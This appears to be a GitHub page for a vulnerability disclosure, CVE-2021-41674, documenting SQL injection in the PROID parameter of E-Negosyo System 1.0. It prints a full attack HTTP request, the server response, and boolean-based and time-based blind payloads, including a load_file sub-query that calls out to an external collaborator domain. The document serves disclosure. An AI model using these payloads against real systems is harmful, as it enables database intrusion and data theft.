Skip to content
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
CVE-mitre/CVE-2021-41674/
CVE-mitre/CVE-2021-41674/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 
 
 

CVE-2021-41674

Vendor

Software

Description:

The PROID parameter from E-Negosyo System 1.0 app appears to be vulnerable to SQL injection attacks in two types of injections - time-based blind and boolean-based blind. The payload '+(select load_file('\\4x2hh1o010l184bd0ql510xgq7w0kw8nbb3yvmk.nu11secur1tycollaborator.net\juc'))+' was submitted in the PROID parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.

MySQL request:

POST /bsenordering/cart/controller.php?action=add HTTP/1.1
Host: 192.168.1.2
Origin: http://192.168.1.2
Cookie: PHPSESSID=n2krmhjsahctm8bpj44kms36b4
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.2/bsenordering/index.php?q=product
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 57

PROPRICE=50&PROQTY=10&PROID=201735'%2b(select%20load_file('%5c%5c%5c%5c4x2hh1o010l184bd0ql510xgq7w0kw8nbb3yvmk.nu11secur1tycollaborator.net%5c%5cjuc'))%2b'&btnorder=%C2%9E%C3%A9e

MySQL response:

HTTP/1.1 200 OK
Date: Sat, 30 Oct 2021 06:28:29 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Payloads

---
Parameter: PROID (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: PROPRICE=50&PROQTY=10&PROID=201735'+(select load_file('\\\\4x2hh1o010l184bd0ql510xgq7w0kw8nbb3yvmk.nu11secur1tycollaborator.net\\juc'))+'' OR NOT 5430=5430#&btnorder=%C2%9E%C3%A9e

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: PROPRICE=50&PROQTY=10&PROID=201735'+(select load_file('\\\\4x2hh1o010l184bd0ql510xgq7w0kw8nbb3yvmk.nu11secur1tycollaborator.net\\juc'))+'' AND (SELECT 8860 FROM (SELECT(SLEEP(5)))cikV)-- oroY&btnorder=%C2%9E%C3%A9e
---

Reproduce:

NOTE:

  • The PoC A.K.A CVE-SQL.py is encrypted for security reasons!

href

Proof:

href